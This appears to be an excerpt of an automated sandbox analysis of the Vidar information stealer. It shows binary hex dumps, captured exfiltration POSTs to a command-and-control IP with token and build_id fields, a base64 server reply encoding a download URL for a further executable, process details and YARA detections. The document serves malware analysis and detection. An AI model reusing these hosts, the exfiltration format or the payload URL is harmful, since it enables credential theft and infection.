                                                                                                                          Data Ascii: d8C0;^h|D$Fh|$urVd@|tKNHtB=Xu4t$TRPQEt$DF81L$01$e^_[]t$D$|$D$pdD$H<@D>D$1V>D$>D$>D$
                                                                                                                          2024-10-03 01:27:08 UTC16384INData Raw: e7 00 00 00 8b 99 4c 01 00 00 85 db 0f 85 82 00 00 00 8b 99 48 01 00 00 85 db 75 6b 8b 99 44 01 00 00 85 db 75 7b ff 81 40 01 00 00 8a 5d f3 88 d8 50 e8 d0 ca 11 00 83 c4 04 89 c3 85 c0 0f 84 a7 00 00 00 57 ff 75 e4 53 e8 0f 1c 18 00 83 c4 0c c6 04 3b 00 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c 89 18 0f b6 0b 80 b9 7a f8 19 10 00 78 4a 8b 4d e8 80 b9 d0 00 00 00 02 0f 83 83 00 00 00 83 c4 10 5e 5f 5b 5d c3 8b 03 89 81 48 01 00 00 e9 50 ff ff ff 8b 03 89 81 4c 01 00 00 e9 43 ff ff ff 8b 03 89 81 44 01 00 00 e9 36 ff ff ff ff 81 3c 01 00 00 e9 73 ff ff ff 80 f9 5b 0f b6 c9 ba 5d 00 00 00 0f 45 d1 89 55 ec 31 f6 46 89 df 8a 0c 33 3a 4d ec 74 06 88 0f 46 47 eb f2 8b 4d ec 38 4c 33 01 74 2d c6 07 00 eb 84 8d 04 b6 8b 4d ec 8d 04 81 83 c0 0c c7 00 00 00 00 00 e9 6d
                                                                                                                          Data Ascii: LHukDu{@]PWuS;MzxJM^_[]HPLCD6<s[]EU1F3:MtFGM8L3t-Mm
                                                                                                                          2024-10-03 01:27:08 UTC16384INData Raw: 59 18 e8 60 50 fe ff 31 c0 39 46 24 0f 84 b8 f6 ff ff 8b 57 10 85 d2 74 09 8b 4c 24 20 e8 75 c2 ff ff 8b 7c 24 0c c7 47 10 00 00 00 00 e9 98 f6 ff ff 8b 06 89 81 44 01 00 00 e9 e3 f9 ff ff ff 81 3c 01 00 00 e9 80 fc ff ff 8b 44 24 14 80 b8 d0 00 00 00 00 0f 85 f3 fb ff ff 8b 44 24 20 8b 40 10 8b 4c 38 0c 83 79 48 00 0f 85 de fb ff ff ff 34 38 68 b4 e0 1c 10 ff 74 24 1c e8 06 09 00 00 83 c4 0c e9 c5 fb ff ff 8b 4c 24 1c e9 ae fd ff ff 8a 80 08 f7 19 10 3a 83 08 f7 19 10 0f 84 02 fa ff ff e9 c9 f9 ff ff 8b 44 24 20 80 b8 b1 00 00 00 00 0f 84 47 04 00 00 68 48 01 1d 10 ff 74 24 18 e8 5f 2a 01 00 83 c4 08 e9 33 f7 ff ff 8b 44 24 0c 80 48 1e 01 66 83 78 22 00 0f 8e a5 f5 ff ff 31 c9 b8 0e 00 00 00 8b 54 24 0c 8b 52 04 8b 74 02 f6 89 f7 c1 ef 04 83 e7 0f 83 ff
                                                                                                                          Data Ascii: Y`P19F$WtL$ u|$GD<D$D$ @L8yH48ht$L$:D$ GhHt$_*3D$Hfx"1T$Rt
                                                                                                                          2024-10-03 01:27:08 UTC16384INData Raw: 00 00 85 c0 0f 85 34 f9 ff ff e9 a7 e8 ff ff c7 44 24 24 00 00 00 00 e9 0b f1 ff ff 8b 44 24 0c 8b 40 10 8b 40 1c 8b 4c 24 08 3b 41 3c 0f 84 95 ea ff ff 8b 7c 24 08 ff 37 68 27 f8 1c 10 ff 74 24 0c e8 e0 ea 00 00 83 c4 0c c7 44 24 24 00 00 00 00 e9 a2 f0 ff ff 68 48 e4 1b 10 8b 7c 24 08 57 e8 c1 ea 00 00 83 c4 08 be 0b 00 00 00 68 40 7e 1c 10 68 14 ce 01 00 68 40 bb 1b 10 68 78 fc 1b 10 56 e8 8f 4f 01 00 83 c4 14 89 77 0c c7 44 24 1c 00 00 00 00 e9 83 f8 ff ff 66 ba 1e 00 31 c0 85 c9 0f 85 54 f1 ff ff 31 d2 e9 5b f1 ff ff 31 ff 66 ba 28 00 be ff 0f 00 00 89 cb 31 c0 83 c2 28 89 f9 0f a4 d9 1c c1 e8 04 39 de bb 00 00 00 00 19 fb 89 cb 89 c7 0f 83 f2 f0 ff ff eb df a9 fd ff ff ff 74 65 31 f6 46 b8 ec bb 1b 10 e9 c1 fd ff ff 31 c0 e9 85 f2 ff ff c7 44 24 18
                                                                                                                          Data Ascii: 4D$$D$@@L$;A<|$7h't$D$$hH|$Wh@~hh@hxVOwD$f1T1[1f(1(9te1F1D$


Session ID: 17
Source IP: 192.168.2.7
Source Port: 57963
Destination IP: 49.12.197.9
Destination Port: 443
PID: 7620
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp: 2024-10-03 01:27:10 UTC; Bytes transferred: 277; Direction: OUT; Data:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JDBFIIEBGCAKKEBFBAAF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 1145
Connection: Keep-Alive
Cache-Control: no-cache
Timestamp: 2024-10-03 01:27:10 UTC; Bytes transferred: 1145; Direction: OUT
                                                                                                                          Data Ascii: ------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------JDBFIIEBGCAKKEBFBAAFContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------JDBFIIEBGCAKKEBFBAAFCont
Timestamp: 2024-10-03 01:27:11 UTC; Bytes transferred: 158; Direction: IN; Data:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 01:27:11 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

Timestamp: 2024-10-03 01:27:11 UTC; Bytes transferred: 12; Direction: IN; Data:
Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID: 18
Source IP: 192.168.2.7
Source Port: 57964
Destination IP: 49.12.197.9
Destination Port: 443
PID: 7620
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp: 2024-10-03 01:27:12 UTC; Bytes transferred: 276; Direction: OUT; Data:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----JJEGCBGIDHCAKEBGIIDB
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
Timestamp: 2024-10-03 01:27:12 UTC; Bytes transferred: 331; Direction: OUT
                                                                                                                          Data Ascii: ------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------JJEGCBGIDHCAKEBGIIDBContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------JJEGCBGIDHCAKEBGIIDBCont
Timestamp: 2024-10-03 01:27:13 UTC; Bytes transferred: 158; Direction: IN; Data:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 01:27:12 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Timestamp: 2024-10-03 01:27:13 UTC; Bytes transferred: 2228; Direction: IN


Session ID: 19
Source IP: 192.168.2.7
Source Port: 57965
Destination IP: 49.12.197.9
Destination Port: 443
PID: 7620
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp: 2024-10-03 01:27:13 UTC; Bytes transferred: 276; Direction: OUT; Data:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----HDGCFHIDAKECFHIEBFCG
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 331
Connection: Keep-Alive
Cache-Control: no-cache
Timestamp: 2024-10-03 01:27:13 UTC; Bytes transferred: 331; Direction: OUT
                                                                                                                          Data Ascii: ------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------HDGCFHIDAKECFHIEBFCGContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------HDGCFHIDAKECFHIEBFCGCont
Timestamp: 2024-10-03 01:27:14 UTC; Bytes transferred: 158; Direction: IN; Data:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 01:27:14 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close
Timestamp: 2024-10-03 01:27:14 UTC; Bytes transferred: 1524; Direction: IN


Session ID: 20
Source IP: 192.168.2.7
Source Port: 57966
Destination IP: 49.12.197.9
Destination Port: 443
PID: 7620
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp: 2024-10-03 01:27:15 UTC; Bytes transferred: 276; Direction: OUT; Data:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----KEHDHIDAEHCFHJJJJECA
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 461
Connection: Keep-Alive
Cache-Control: no-cache
Timestamp: 2024-10-03 01:27:15 UTC; Bytes transferred: 461; Direction: OUT
                                                                                                                          Data Ascii: ------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------KEHDHIDAEHCFHJJJJECAContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------KEHDHIDAEHCFHJJJJECACont
Timestamp: 2024-10-03 01:27:16 UTC; Bytes transferred: 158; Direction: IN; Data:
HTTP/1.1 200 OK
Server: nginx
Date: Thu, 03 Oct 2024 01:27:16 GMT
Content-Type: text/html; charset=UTF-8
Transfer-Encoding: chunked
Connection: close

Timestamp: 2024-10-03 01:27:16 UTC; Bytes transferred: 12; Direction: IN; Data:
Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
Data Ascii: 2ok0


Session ID: 21
Source IP: 192.168.2.7
Source Port: 57968
Destination IP: 49.12.197.9
Destination Port: 443
PID: 7620
Process: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe

Timestamp: 2024-10-03 01:27:17 UTC; Bytes transferred: 278; Direction: OUT; Data:
POST / HTTP/1.1
Content-Type: multipart/form-data; boundary=----FBKFCFBFIDGCGDHJDBKF
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
Host: 49.12.197.9
Content-Length: 98177
Connection: Keep-Alive
Cache-Control: no-cache
Timestamp: 2024-10-03 01:27:17 UTC; Bytes transferred: 16355; Direction: OUT
                                                                                                                          Data Ascii: ------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="token"616e377245a2b36ffedf2f7ef732c045------FBKFCFBFIDGCGDHJDBKFContent-Disposition: form-data; name="build_id"433cd71b7a2bdd3668a493b00ee95630------FBKFCFBFIDGCGDHJDBKFCont
Timestamp: 2024-10-03 01:27:17 UTC; Bytes transferred: 16355; Direction: OUT
Timestamp: 2024-10-03 01:27:17 UTC; Bytes transferred: 16355; Direction: OUT
Timestamp: 2024-10-03 01:27:17 UTC; Bytes transferred: 16355; Direction: OUT
Timestamp: 2024-10-03 01:27:17 UTC; Bytes transferred: 16355; Direction: OUT
Timestamp: 2024-10-03 01:27:17 UTC; Bytes transferred: 16355; Direction: OUT
Timestamp: 2024-10-03 01:27:17 UTC; Bytes transferred: 47; Direction: OUT
                                                                                                                          Data Ascii: /8AXxN/6DHQB//Z------FBKFCFBFIDGCGDHJDBKF--
2024-10-03 01:27:19 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:27:18 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
2024-10-03 01:27:19 UTC | 12 | IN | Data Raw: 32 0d 0a 6f 6b 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 2ok0


Session ID:22
Source IP:192.168.2.7
Source Port:57969
Destination IP:49.12.197.9
Destination Port:443
PID:7620
Process:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
Timestamp | Bytes transferred | Direction | Data
2024-10-03 01:27:20 UTC | 276 | OUT | POST / HTTP/1.1
                                                                                                                          Content-Type: multipart/form-data; boundary=----AAAAECGHCBGCBFHIIDHI
                                                                                                                          User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:130.0) Gecko/20100101 Firefox/130.0
                                                                                                                          Host: 49.12.197.9
                                                                                                                          Content-Length: 331
                                                                                                                          Connection: Keep-Alive
                                                                                                                          Cache-Control: no-cache
2024-10-03 01:27:20 UTC | 331 | OUT | Data Raw: 2d 2d 2d 2d 2d 2d 41 41 41 41 45 43 47 48 43 42 47 43 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 36 31 36 65 33 37 37 32 34 35 61 32 62 33 36 66 66 65 64 66 32 66 37 65 66 37 33 32 63 30 34 35 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 45 43 47 48 43 42 47 43 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 62 75 69 6c 64 5f 69 64 22 0d 0a 0d 0a 34 33 33 63 64 37 31 62 37 61 32 62 64 64 33 36 36 38 61 34 39 33 62 30 30 65 65 39 35 36 33 30 0d 0a 2d 2d 2d 2d 2d 2d 41 41 41 41 45 43 47 48 43 42 47 43 42 46 48 49 49 44 48 49 0d 0a 43 6f 6e 74
Data Ascii:
------AAAAECGHCBGCBFHIIDHI
Content-Disposition: form-data; name="token"

616e377245a2b36ffedf2f7ef732c045
------AAAAECGHCBGCBFHIIDHI
Content-Disposition: form-data; name="build_id"

433cd71b7a2bdd3668a493b00ee95630
------AAAAECGHCBGCBFHIIDHI
Cont
2024-10-03 01:27:21 UTC | 158 | IN | HTTP/1.1 200 OK
                                                                                                                          Server: nginx
                                                                                                                          Date: Thu, 03 Oct 2024 01:27:21 GMT
                                                                                                                          Content-Type: text/html; charset=UTF-8
                                                                                                                          Transfer-Encoding: chunked
                                                                                                                          Connection: close
2024-10-03 01:27:21 UTC | 91 | IN | Data Raw: 35 30 0d 0a 4d 54 49 32 4e 6a 6b 78 4d 48 78 6f 64 48 52 77 4f 69 38 76 4d 54 51 33 4c 6a 51 31 4c 6a 51 30 4c 6a 45 77 4e 43 39 73 5a 47 31 7a 4c 32 45 30 4d 7a 51 34 4e 6a 45 79 4f 44 4d 30 4e 79 35 6c 65 47 56 38 4d 58 78 72 61 32 74 72 66 41 3d 3d 0d 0a 30 0d 0a 0d 0a
                                                                                                                          Data Ascii: 50MTI2NjkxMHxodHRwOi8vMTQ3LjQ1LjQ0LjEwNC9sZG1zL2E0MzQ4NjEyODM0Ny5leGV8MXxra2trfA==0



                                                                                                                          Target ID:0
                                                                                                                          Start time:21:26:15
                                                                                                                          Start date:02/10/2024
                                                                                                                          Path:C:\Users\user\Desktop\file.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\Desktop\file.exe"
                                                                                                                          Imagebase:0x380000
                                                                                                                          File size:405'544 bytes
                                                                                                                          MD5 hash:CC94BE13BC24599E326D03CA246A61FA
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000000.00000002.1358313297.000000006D771000.00000004.00000001.01000000.00000007.sdmp, Author: Joe Security
                                                                                                                          Reputation:low
                                                                                                                          Has exited:true

                                                                                                                          Target ID:1
                                                                                                                          Start time:21:26:15
                                                                                                                          Start date:02/10/2024
                                                                                                                          Path:C:\Windows\System32\conhost.exe
                                                                                                                          Wow64 process (32bit):false
                                                                                                                          Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                                                                                                                          Imagebase:0x7ff75da10000
                                                                                                                          File size:862'208 bytes
                                                                                                                          MD5 hash:0D698AF330FD17BEE3BF90011D49251D
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Reputation:high
                                                                                                                          Has exited:false

                                                                                                                          Target ID:3
                                                                                                                          Start time:21:26:16
                                                                                                                          Start date:02/10/2024
                                                                                                                          Path:C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe"
                                                                                                                          Imagebase:0xf40000
                                                                                                                          File size:43'016 bytes
                                                                                                                          MD5 hash:5D1D74198D75640E889F0A577BBF31FC
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:C, C++ or other language
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2579771123.00000000031A5000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Vidar_1, Description: Yara detected Vidar stealer, Source: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_AntiVM_3, Description: Yara detected AntiVM_3, Source: 00000003.00000002.2578673442.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000003.00000002.2578673442.00000000005A1000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:false


                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:12.1%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:6.8%
                                                                                                                            Total number of Nodes:999
                                                                                                                            Total number of Limit Nodes:10
11978->11979 11979->11968 11980->11971 11982 6d76279b __InternalCxxFrameHandler LeaveCriticalSection 11981->11982 11983 6d76216b 11982->11983 11983->11940 11985 6d75f66d 11984->11985 11991 6d75cbcc 11984->11991 11992 6d75fd33 11985->11992 11988 6d75fd6e ___vcrt_FlsSetValue 6 API calls 11989 6d75f683 11988->11989 11997 6d75f647 11989->11997 11991->11533 11993 6d75fbd2 ___vcrt_FlsFree 5 API calls 11992->11993 11994 6d75fd4d 11993->11994 11995 6d75fd65 TlsGetValue 11994->11995 11996 6d75f674 11994->11996 11995->11996 11996->11988 11998 6d75f651 11997->11998 11999 6d75f65e 11997->11999 11998->11999 12001 6d761113 11998->12001 11999->11991 12002 6d762800 __freea 14 API calls 12001->12002 12003 6d76112b 12002->12003 12003->11999 12010 6d75f69c 12004->12010 12006 6d75cba8 12006->11556 12007 6d761dcf 12006->12007 12008 6d7624d8 __dosmaperr 14 API calls 12007->12008 12009 6d75cbb4 12008->12009 12009->11559 12009->11560 12011 6d75f6a5 12010->12011 12012 6d75f6a8 GetLastError 12010->12012 12011->12006 12013 6d75fd33 ___vcrt_FlsGetValue 6 API calls 12012->12013 12014 6d75f6bd 12013->12014 12015 6d75f722 SetLastError 12014->12015 12016 6d75fd6e ___vcrt_FlsSetValue 6 API calls 12014->12016 12023 6d75f6dc 12014->12023 12015->12006 12017 6d75f6d6 __InternalCxxFrameHandler 12016->12017 12018 6d75f6fe 12017->12018 12019 6d75fd6e ___vcrt_FlsSetValue 6 API calls 12017->12019 12017->12023 12020 6d75fd6e ___vcrt_FlsSetValue 6 API calls 12018->12020 12021 6d75f712 12018->12021 12019->12018 12020->12021 12022 6d761113 ___std_type_info_destroy_list 14 API calls 12021->12022 12022->12023 12023->12015 12025 6d75cc08 ___scrt_release_startup_lock 12024->12025 12026 6d75cc0c 12025->12026 12029 6d75cc18 __DllMainCRTStartup@12 12025->12029 12049 6d761c39 12026->12049 12028 6d75cc16 12028->11567 12030 6d75cc25 12029->12030 12053 6d761422 12029->12053 12030->11567 12122 6d75f28a InterlockedFlushSList 12033->12122 12037 6d75cdb0 12036->12037 12038 6d75c704 12037->12038 12126 6d761de2 12037->12126 
12042 6d75c740 12038->12042 12040 6d75cdbe 12041 6d75f2df ___scrt_uninitialize_crt 7 API calls 12040->12041 12041->12038 12240 6d75cc26 12042->12240 12046 6d751d24 12045->12046 12257 6d75c4d0 12046->12257 12048 6d752696 12048->11579 12048->11583 12050 6d761c45 __EH_prolog3 12049->12050 12064 6d761b04 12050->12064 12052 6d761c6c __DllMainCRTStartup@12 12052->12028 12054 6d76144f 12053->12054 12062 6d761460 12053->12062 12081 6d7614ea GetModuleHandleW 12054->12081 12059 6d76149e 12059->11567 12088 6d7612ed 12062->12088 12065 6d761b10 ___scrt_is_nonwritable_in_current_image 12064->12065 12072 6d762753 EnterCriticalSection 12065->12072 12067 6d761b1e 12073 6d761b5f 12067->12073 12072->12067 12074 6d761b2b 12073->12074 12075 6d761b7e 12073->12075 12077 6d761b53 12074->12077 12075->12074 12076 6d762800 __freea 14 API calls 12075->12076 12076->12074 12080 6d76279b LeaveCriticalSection 12077->12080 12079 6d761b3c 12079->12052 12080->12079 12082 6d761454 12081->12082 12082->12062 12083 6d761545 GetModuleHandleExW 12082->12083 12084 6d761584 GetProcAddress 12083->12084 12085 6d761598 12083->12085 12084->12085 12086 6d7615b4 12085->12086 12087 6d7615ab FreeLibrary 12085->12087 12086->12062 12087->12086 12089 6d7612f9 ___scrt_is_nonwritable_in_current_image 12088->12089 12103 6d762753 EnterCriticalSection 12089->12103 12091 6d761303 12104 6d76133a 12091->12104 12093 6d761310 12108 6d76132e 12093->12108 12096 6d7614b9 12112 6d76152c 12096->12112 12098 6d7614c3 12099 6d7614d7 12098->12099 12100 6d7614c7 GetCurrentProcess TerminateProcess 12098->12100 12101 6d761545 __InternalCxxFrameHandler 3 API calls 12099->12101 12100->12099 12102 6d7614df ExitProcess 12101->12102 12103->12091 12105 6d761346 ___scrt_is_nonwritable_in_current_image __InternalCxxFrameHandler 12104->12105 12106 6d761c39 __DllMainCRTStartup@12 14 API calls 12105->12106 12107 6d7613aa __InternalCxxFrameHandler 12105->12107 12106->12107 12107->12093 12111 6d76279b LeaveCriticalSection 12108->12111 12110 6d76131c 
12110->12059 12110->12096 12111->12110 12115 6d76285f 12112->12115 12114 6d761531 __InternalCxxFrameHandler 12114->12098 12116 6d76286e __InternalCxxFrameHandler 12115->12116 12117 6d76287b 12116->12117 12119 6d76415f 12116->12119 12117->12114 12120 6d7640da __dosmaperr 5 API calls 12119->12120 12121 6d76417b 12120->12121 12121->12117 12123 6d75f29a 12122->12123 12125 6d75cac9 12122->12125 12124 6d761113 ___std_type_info_destroy_list 14 API calls 12123->12124 12123->12125 12124->12123 12125->11573 12127 6d761ded 12126->12127 12128 6d761dff ___scrt_uninitialize_crt 12126->12128 12129 6d761dfb 12127->12129 12131 6d764c98 12127->12131 12128->12040 12129->12040 12134 6d764b29 12131->12134 12137 6d764a7d 12134->12137 12138 6d764a89 ___scrt_is_nonwritable_in_current_image 12137->12138 12145 6d762753 EnterCriticalSection 12138->12145 12140 6d764aff 12154 6d764b1d 12140->12154 12143 6d764a93 ___scrt_uninitialize_crt 12143->12140 12146 6d7649f1 12143->12146 12145->12143 12147 6d7649fd ___scrt_is_nonwritable_in_current_image 12146->12147 12157 6d764db5 EnterCriticalSection 12147->12157 12149 6d764a40 12171 6d764a71 12149->12171 12150 6d764a07 ___scrt_uninitialize_crt 12150->12149 12158 6d764c33 12150->12158 12239 6d76279b LeaveCriticalSection 12154->12239 12156 6d764b0b 12156->12129 12157->12150 12159 6d764c48 ___std_exception_copy 12158->12159 12160 6d764c4f 12159->12160 12161 6d764c5a 12159->12161 12163 6d764b29 ___scrt_uninitialize_crt 68 API calls 12160->12163 12174 6d764bca 12161->12174 12164 6d764c55 12163->12164 12198 6d760ca4 12164->12198 12169 6d764c7b 12187 6d766454 12169->12187 12238 6d764dc9 LeaveCriticalSection 12171->12238 12173 6d764a5f 12173->12143 12175 6d764be3 12174->12175 12179 6d764c0a 12174->12179 12176 6d764fcc ___scrt_uninitialize_crt 39 API calls 12175->12176 12175->12179 12177 6d764bff 12176->12177 12204 6d766c73 12177->12204 12179->12164 12180 6d764fcc 12179->12180 12181 6d764fed 12180->12181 12182 6d764fd8 12180->12182 12181->12169 12183 6d762923 
__dosmaperr 14 API calls 12182->12183 12184 6d764fdd 12183->12184 12215 6d760f68 12184->12215 12188 6d766465 12187->12188 12192 6d766472 12187->12192 12189 6d762923 __dosmaperr 14 API calls 12188->12189 12197 6d76646a 12189->12197 12190 6d7664bb 12191 6d762923 __dosmaperr 14 API calls 12190->12191 12194 6d7664c0 12191->12194 12192->12190 12193 6d766499 12192->12193 12218 6d7663b2 12193->12218 12196 6d760f68 ___std_exception_copy 39 API calls 12194->12196 12196->12197 12197->12164 12199 6d760cb0 12198->12199 12200 6d760cc7 12199->12200 12231 6d760d4f 12199->12231 12201 6d760cda 12200->12201 12203 6d760d4f ___std_exception_copy 39 API calls 12200->12203 12201->12149 12203->12201 12205 6d766c7f ___scrt_is_nonwritable_in_current_image 12204->12205 12206 6d766cc0 12205->12206 12207 6d766d06 12205->12207 12214 6d766c87 12205->12214 12208 6d760eeb ___std_exception_copy 39 API calls 12206->12208 12209 6d766271 ___scrt_uninitialize_crt EnterCriticalSection 12207->12209 12208->12214 12210 6d766d0c 12209->12210 12211 6d766d2a 12210->12211 12212 6d766d84 ___scrt_uninitialize_crt 62 API calls 12210->12212 12213 6d766d7c ___scrt_uninitialize_crt LeaveCriticalSection 12211->12213 12212->12211 12213->12214 12214->12179 12216 6d760eb4 ___std_exception_copy 39 API calls 12215->12216 12217 6d760f74 12216->12217 12217->12169 12219 6d7663be ___scrt_is_nonwritable_in_current_image 12218->12219 12220 6d766271 ___scrt_uninitialize_crt EnterCriticalSection 12219->12220 12222 6d7663cd 12220->12222 12221 6d766412 12224 6d762923 __dosmaperr 14 API calls 12221->12224 12222->12221 12223 6d766348 ___scrt_uninitialize_crt 39 API calls 12222->12223 12225 6d7663f9 FlushFileBuffers 12223->12225 12226 6d766419 12224->12226 12225->12226 12227 6d766405 GetLastError 12225->12227 12229 6d766448 ___scrt_uninitialize_crt LeaveCriticalSection 12226->12229 12228 6d762910 __dosmaperr 14 API calls 12227->12228 12228->12221 12230 6d766431 12229->12230 12230->12197 12232 6d760d62 12231->12232 12233 6d760d59 
12231->12233 12232->12200 12234 6d760d09 ___std_exception_copy 16 API calls 12233->12234 12235 6d760d5e 12234->12235 12235->12232 12236 6d761eba CallUnexpected 39 API calls 12235->12236 12237 6d760d6b 12236->12237 12238->12173 12239->12156 12245 6d761e12 12240->12245 12243 6d75f761 ___vcrt_uninitialize_ptd 6 API calls 12244 6d75c745 12243->12244 12244->11580 12248 6d762658 12245->12248 12249 6d762662 12248->12249 12250 6d75cc2d 12248->12250 12252 6d7641fd 12249->12252 12250->12243 12253 6d7640da __dosmaperr 5 API calls 12252->12253 12254 6d764219 12253->12254 12255 6d764234 TlsFree 12254->12255 12256 6d764222 12254->12256 12256->12250 12258 6d75c4d9 IsProcessorFeaturePresent 12257->12258 12259 6d75c4d8 12257->12259 12261 6d75c8e4 12258->12261 12259->12048 12264 6d75c8a7 SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 12261->12264 12263 6d75c9c7 12263->12048 12264->12263 12265 6d75c884 12266 6d75c892 12265->12266 12267 6d75c88d 12265->12267 12271 6d75c74e 12266->12271 12286 6d75ca68 12267->12286 12273 6d75c75a ___scrt_is_nonwritable_in_current_image 12271->12273 12272 6d75c783 dllmain_raw 12275 6d75c79d dllmain_crt_dispatch 12272->12275 12282 6d75c769 12272->12282 12273->12272 12274 6d75c77e 12273->12274 12273->12282 12276 6d751cc0 __DllMainCRTStartup@12 5 API calls 12274->12276 12275->12274 12275->12282 12277 6d75c7be 12276->12277 12278 6d75c7ef 12277->12278 12281 6d751cc0 __DllMainCRTStartup@12 5 API calls 12277->12281 12279 6d75c7f8 dllmain_crt_dispatch 12278->12279 12278->12282 12280 6d75c80b dllmain_raw 12279->12280 12279->12282 12280->12282 12283 6d75c7d6 12281->12283 12284 6d75c69e __DllMainCRTStartup@12 86 API calls 12283->12284 12285 6d75c7e4 dllmain_raw 12284->12285 12285->12278 12287 6d75ca7e 12286->12287 12289 6d75ca87 12287->12289 12290 6d75ca1b GetSystemTimeAsFileTime GetCurrentThreadId GetCurrentProcessId QueryPerformanceCounter 12287->12290 12289->12266 12290->12289 12356 6d76190e 12371 6d76395d 12356->12371 
